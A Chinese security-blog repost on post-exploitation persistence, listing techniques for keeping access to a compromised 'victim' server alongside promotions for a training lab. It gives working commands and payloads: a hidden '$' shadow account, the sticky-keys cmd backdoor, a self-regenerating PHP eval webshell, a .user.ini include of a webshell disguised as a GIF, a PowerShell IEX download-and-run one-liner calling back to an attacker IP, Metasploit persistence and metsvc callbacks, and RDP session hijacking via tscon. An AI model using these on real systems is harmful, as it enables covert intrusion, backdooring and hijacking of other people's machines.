后渗透之维护权限
2019-08-16 19:00:00 Author: mp.weixin.qq.com(查看原文) 阅读量:71 收藏

本文转自公众号: 洛米唯熊

简介

何为“后渗透”?就是获取到受害者服务器的权限后,再继续对受害者服务器进行长期攻击或者信息获取的一种持续性手段。常见的手段有,后门、影子账户、会话劫持等等。

很多同学在学习metasploit的时候,最大的目标就是拿到meterpreter了吧?关于如何拿到meterpreter的权限在合天网安实验室已经有相关的实验——Metasploit后渗透入门,可是拿到meterpreter之后,我们该做些什么,又能做些什么呢?本实验将会和大家一同学习拿到meterpreter后的渗透学习,这一阶段也被称为后渗透阶段。长按下列二维码,可预览学习!

长按二位开始操作

实验

一、影子账户

原理:创建一个跟普通用户一样的用户,但是只能在注册表中才能查看到的用户。

net user luomiweixiong$ /addnet user

二、shift后门

原理:将按5下shift时调用的“粘滞键”替换为“CMD”

将 C:\WINDOWS\system32\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不 删除就会自动变回去

找到  C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe,放回文 件夹中

这次按5次shift键就可以打开cmd了

三、反弹加入自启(鸡肋)

1、NC反弹

2、Bash反弹

3、perl反弹

4、Python反弹

5、PHP反弹

6、等等

将反弹的脚本写入到启动项里,当受害者启动服务器时,自动反弹shell。弊端就是要一直监听,还要有公网的IP。

在渗透测试过程中,经常会用到反弹shell,相关的反弹shell学习,可到合天网安实验室学习实验——反弹shell的N种姿势,通过本实验的学习,了解反弹shell的概念和原理,掌握各种反弹shell的实现技术和方法。长按下列二维码,或点击文末“阅读原文”可预览学习!(建议PC操作哟。
长按二位开始操作

四、隐藏后门文件

1、将木马文件属性改为“隐藏”

2、将木马名字进行伪装处理,伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。

3、利用循环不死马(举栗子)

<?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while(1){file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");$b=array_keys($a)[0];eval($b);?>');sleep(8);}?>

说明:此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马.

五、利用.user.ini文件自动包含木马文件

在“.user.ini”文件写入

auto_prepend_file=luomiweixiong.gif

在“luomiweixiong.gif”文件写入一句话木马

<!–?php $a = “a”.”s”.”s”.”e”.”r”.”t”;$a($_POST[“kk”]); ?–>

利用成功前提下必须有以下三个文件,
1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马

说明:在限制了PHP文件上传的条件下,上传ini文件,再进行文件包含拿shell.

注:.user.ini只有在php5.3以后可以用 生效时间是看配置文件里的user_ini.cache_ttl 默认一般是300秒,理论上是php5.3以后都可以,但有些集成环境包含会乱码 例如phpstudy。

六、Powershell权限维持

参考此PowerShell脚本

https://github.com/re4lity/Schtasks-Backdoor

利用代码:

powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"

说明:

1、192.168.124.25为受害者IP,前提是要把PowerShell脚本放到受害者服务器能访问到的根路径。

2、192.168.124.14为接收反弹回来的IP,可用NC监听反弹回来的shell

七、metasploit权限维持

1、Persistence模块

前提是利用MSF获取到了对方的会话

run persistence -U -i 12 -p 6666 -r 192.168.124.14

说明

-i  目标自动‍回连时间

-p  设置目标反向连接的端口

-r  设置目标反向连接的ip地址

-U  设置目标自启动

加入自启动后,就算受害者机器再次启动也能弹回shell

2、metsvc 模块

前提是利用MSF获取到了对方的会话

run metsvc -A

说明:‍

-A 自动启动一个匹配的 multi/handler 以连接到该服务

该模块是在受害者服务器开启了一个“Meterpreter”服务

‍下次攻击者可‍以利用‍metsvc_bind_tcp监听模块就可以再次获取到shell

监听端口为31337

八、会话劫持

说明:RDP会话劫持是在不知道另一用户密码的条件下进行切换用户登录

query usersc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"net start sesshijack

题外话

维护权限还有很多种方法,我这里只是举几个栗子🌰。

别忘了投稿哦

大家有好的技术原创文章

欢迎投稿至邮箱:[email protected]

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦

有才能的你快来投稿吧!

了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!

点击“阅读全文”,开始学习

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&amp;mid=2652851676&amp;idx=1&amp;sn=9294878cab7ce2d6501b7eb3f74d8d1c&amp;chksm=bd5931118a2eb8071423136a3ef449ef5d02bbfc35e2b38969816e17532a25c74aec640dd39d#rd
如有侵权请联系:admin#unsafe.sh